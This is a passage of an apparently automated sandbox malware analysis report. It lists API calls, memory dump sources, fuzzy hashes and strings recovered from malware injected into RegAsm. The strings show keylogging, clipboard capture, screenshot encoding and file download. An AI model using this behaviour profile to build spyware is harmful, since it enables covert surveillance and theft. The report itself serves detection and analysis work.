                      • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                      • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                      • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                      • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                      • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                      • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                      • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                      • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                      APIs
                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                        • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                      • _UnwindNestedFrames.LIBCMT ref: 00439891
                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                      • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                      • String ID:
                      • API String ID: 2633735394-0
                      • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                      • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                      • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                      • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                      APIs
                      • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                      • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                      • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                      • GetSystemMetrics.USER32(0000004F), ref: 00419402
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: MetricsSystem
                      • String ID:
                      • API String ID: 4116985748-0
                      • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                      • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                      • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                      • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                      APIs
                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                        • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                      • String ID:
                      • API String ID: 1761009282-0
                      • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                      • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                      • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                      • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                      APIs
                      • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorHandling__start
                      • String ID: pow
                      • API String ID: 3213639722-2276729525
                      • Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                      • Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
                      • Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
                      • Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F
                      APIs
                        • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,10006CC1,?,00000000), ref: 10006E94
                      • GetCPInfo.KERNEL32(00000000,10006CC1,?,?,?,10006CC1,?,00000000), ref: 10006EA7
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: CodeInfoPageValid
                      • String ID: 6/
                      • API String ID: 546120528-4212659297
                      • Opcode ID: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                      • Instruction ID: 1dd91d3823b6bb4934ca9945ee4913e93bf289da146d72ec34fd0236562290e4
                      • Opcode Fuzzy Hash: 4adf61bb8ef5ba689b58ef35b1aaecca0a92cbb4d0ae1edbfb61d6a665a170f3
                      • Instruction Fuzzy Hash: 91513474E043469EFB21CF71DC916BBBBE6EF49280F20807EE48687156D735DA458B90
                      APIs
                      • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 10006AF0
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: Info
                      • String ID: $6/
                      • API String ID: 1807457897-933382269
                      • Opcode ID: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                      • Instruction ID: 7792c4a5177154c3e9ca344f7bd1be717728489360a1cc3eced530dab922c6d1
                      • Opcode Fuzzy Hash: 6cedc9456a51a48c8b79c853d380540c5183232597a17884e183f7c8afc1900e
                      • Instruction Fuzzy Hash: D241FCB050429C9AFB21CF148C84BEABBEAEB49344F2444EDE5C9C6146D735AA85DF20
                      APIs
                      • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418ABE
                        • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                      • SHCreateMemStream.SHLWAPI(00000000), ref: 00418B0B
                        • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                        • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                      • String ID: image/jpeg
                      • API String ID: 1291196975-3785015651
                      • Opcode ID: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                      • Instruction ID: 71c7567624fb1f0fb67e5b365d5baafb3eed0516d04e2b9615b8e3d4f66a2876
                      • Opcode Fuzzy Hash: 6e04f8ac358d86261f340c02fc4254ea4fa5b72d51dab4b51890127c9f8658cf
                      • Instruction Fuzzy Hash: 13317F71504300AFC301EF65CC84DAFB7E9FF8A704F00496EF985A7251DB7999448BA6
                      APIs
                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                      • __Init_thread_footer.LIBCMT ref: 0040B797
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer__onexit
                      • String ID: [End of clipboard]$[Text copied to clipboard]
                      • API String ID: 1881088180-3686566968
                      • Opcode ID: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                      • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                      • Opcode Fuzzy Hash: b75b6418a390f749317f2ab44173591ff602460dbf5675c7faf818e64fc176e3
                      • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                      APIs
                      • GetACP.KERNEL32(?,20001004,?,00000002), ref: 00451C12
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: ACP$OCP
                      • API String ID: 0-711371036
                      • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                      • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                      • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                      • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                      APIs
                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100098B1
                      • GetLastError.KERNEL32 ref: 100098DA
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorFileLastWrite
                      • String ID: 6/
                      • API String ID: 442123175-4212659297
                      • Opcode ID: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                      • Instruction ID: 10ae1692938ef1c10bc5cabf9f53a2a3bd6999d6216ca289fae0ab6df1a73c16
                      • Opcode Fuzzy Hash: 44c02fc31167cef82eb2c7325f1918f2fa4c78e7bb82f98d2e24cadcd22c2269
                      • Instruction Fuzzy Hash: 94316171A002199BDB24CF59CC80AD9B3F9FF49350F2185AAE519D7360DB30E985CB50
                      APIs
                      • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 100097C3
                      • GetLastError.KERNEL32 ref: 100097EC
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: ErrorFileLastWrite
                      • String ID: 6/
                      • API String ID: 442123175-4212659297
                      • Opcode ID: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                      • Instruction ID: 38868272ab1662a5a2ad023a6230b7ecc66e9b3593444bcc3211b27e9ed8cf09
                      • Opcode Fuzzy Hash: 2f97b0ea3d2111d9094b6cf8e2123f0946c90a3f737484b600376bf3188e4d44
                      • Instruction Fuzzy Hash: DC21B136A14219DFEB15CF59C884BDAB3F8EB48381F1044AAE94AD7251D730ED81CB20
                      APIs
                      • SHCreateMemStream.SHLWAPI(00000000,00000000,?,?,?,00000000), ref: 00418BAA
                        • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                      • SHCreateMemStream.SHLWAPI(00000000,00000000,00000000,?,?,?,?,00000000), ref: 00418BCF
                        • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                        • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                      • String ID: image/png
                      • API String ID: 1291196975-2966254431
                      • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                      • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                      • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                      • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                      APIs
                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                      Strings
                      • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: LocalTime
                      • String ID: KeepAlive | Enabled | Timeout:
                      • API String ID: 481472006-1507639952
                      • Opcode ID: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                      • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                      • Opcode Fuzzy Hash: 5b49fe7ebc3dd67cdf94e38743eb20928709a3ec39b389cca4b516c591649347
                      • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                      APIs
                      • GetProcAddress.KERNEL32(00000000,?), ref: 10005CA5
                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: AddressProc__crt_fast_encode_pointer
                      • String ID: 6/
                      • API String ID: 2279764990-4212659297
                      • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                      • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                      • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                      • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                      APIs
                      • Sleep.KERNEL32 ref: 00416640
                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: DownloadFileSleep
                      • String ID: !D@
                      • API String ID: 1931167962-604454484
                      • Opcode ID: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                      • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                      • Opcode Fuzzy Hash: e2f37744b7fb9eb9058f71ff0aa918298059d13fe50ac3369e39da324d73493c
                      • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: : $Se.
                      • API String ID: 4218353326-4089948878
                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                      APIs
                      • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: LocalTime
                      • String ID: | $%02i:%02i:%02i:%03i
                      • API String ID: 481472006-2430845779
                      • Opcode ID: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                      • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                      • Opcode Fuzzy Hash: 9943bc0e607642414e1270e8ed0348d03c595322458554df1a59568979ca2f05
                      • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 10002B4F
                      • ___raise_securityfailure.LIBCMT ref: 10002C36
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2931866265.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_10000000_RegAsm.jbxd
                      Similarity
                      • API ID: FeaturePresentProcessor___raise_securityfailure
                      • String ID: 6/
                      • API String ID: 3761405300-4212659297
                      • Opcode ID: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                      • Instruction ID: 3e738cf41e4fedca429440b27c5ceba6e76d410b83429fe86edfa1b27721cda5
                      • Opcode Fuzzy Hash: 70e6b92d4ff8390b97530531c8a31b2bf75f1acffc31a4c733281a71a18183d0
                      • Instruction Fuzzy Hash: 2F21BEB8512361AAF714CF15DED1B44BBE4FB48764F10C02AE9089A3A0E7B0D581CF55
                      APIs
                      • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExistsFilePath
                      • String ID: alarm.wav$hYG
                      • API String ID: 1174141254-2782910960
                      • Opcode ID: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                      • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                      • Opcode Fuzzy Hash: 18e052de717180e5ab5073ed062dd2c189db3243629e7a025cf8991a71f881ef
                      • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                      APIs
                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • CloseHandle.KERNEL32(?), ref: 0040B0B4
                      • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2928318861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000003.00000002.2928318861.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                      • Associated: 00000003.00000002.2928318861.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                      Yara matches
                      Similarity
                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                      • String ID: Online Keylogger Stopped
                      • API String ID: 1623830855-1496645233
                      • Opcode ID: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                      • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                      • Opcode Fuzzy Hash: 086a3c4929947be54678252dfea77875741b8c789e716d5a77e1f3bca4bdded6
                      • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                        • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                      Strings
                      Memory Dump Source
                      • Source File: 00000003.00000002.2931866265.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                      • Associated: 00000003.00000002.2931843207.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
